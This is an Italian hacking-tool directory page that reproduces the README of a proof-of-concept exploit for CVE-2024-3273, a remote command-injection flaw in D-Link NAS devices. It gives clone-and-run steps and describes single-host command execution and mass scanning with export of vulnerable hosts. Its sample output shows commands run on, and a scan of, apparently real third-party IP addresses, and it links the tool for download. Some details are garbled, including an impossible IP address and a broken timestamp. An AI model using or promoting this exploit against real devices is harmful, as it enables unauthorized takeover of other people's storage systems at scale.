Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3273 — Exploit per CVE-2024-3273, supporta host singoli e multipli | Kitploit
Strumenti/GitHubGitHub/adhikara13/cve-2024-3273
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubadhikara13/cve-2024-3273

CVE-2024-3273

Exploit per CVE-2024-3273, supporta host singoli e multipli

Vedi Repository
13112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3273 Prova di Concetto (PoC)

Questo repository contiene una Prova di Concetto (PoC) per CVE-2024-3273, una vulnerabilità di sicurezza scoperta nei dispositivi D-Link NAS. La vulnerabilità consente agli attaccanti di eseguire comandi arbitrari sui dispositivi vulnerabili.

Descrizione

CVE-2024-3273 è una vulnerabilità nei dispositivi D-Link NAS che consente a un attaccante remoto di eseguire comandi arbitrari tramite una richiesta HTTP manipolata all'endpoint cgi-bin/nas_sharing.cgi.

Questa PoC dimostra come la vulnerabilità possa essere sfruttata per eseguire comandi sui dispositivi D-Link NAS vulnerabili.

Requisiti

  • Python 3.x
  • libreria requests

Utilizzo

  1. Clona questo repository:

    root@kitploit:~
    git clone https://github.com/adhikara13/CVE-2024-3273.git
    
  2. Naviga nella directory del repository:

    root@kitploit:~
    cd CVE-2024-3273
    
  • Esegui la PoC:

    root@kitploit:~
    python main.py
    
  • Segui le istruzioni a schermo per scegliere il dispositivo target:

    • Opzione 1: Singolo host (1): Inserisci i dettagli per un singolo dispositivo target, inclusi l'indirizzo IP dell'host e il comando da eseguire.
    • Opzione 2: Host multipli (2): Fornisci un file contenente più dispositivi target nel formato host:port, e scegli se esportare gli host vulnerabili in vulnerables.txt.
  • Esempio

    root@kitploit:~
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.
    

    Dichiarazione di non responsabilità

    Questa PoC è solo a scopo educativo e di ricerca. Usala responsabilmente e solo su dispositivi che sei autorizzato a testare.

    Contributi

    I contributi sono benvenuti! Se trovi problemi o miglioramenti, sentiti libero di aprire un issue o creare una pull request.

    Scarica lo strumento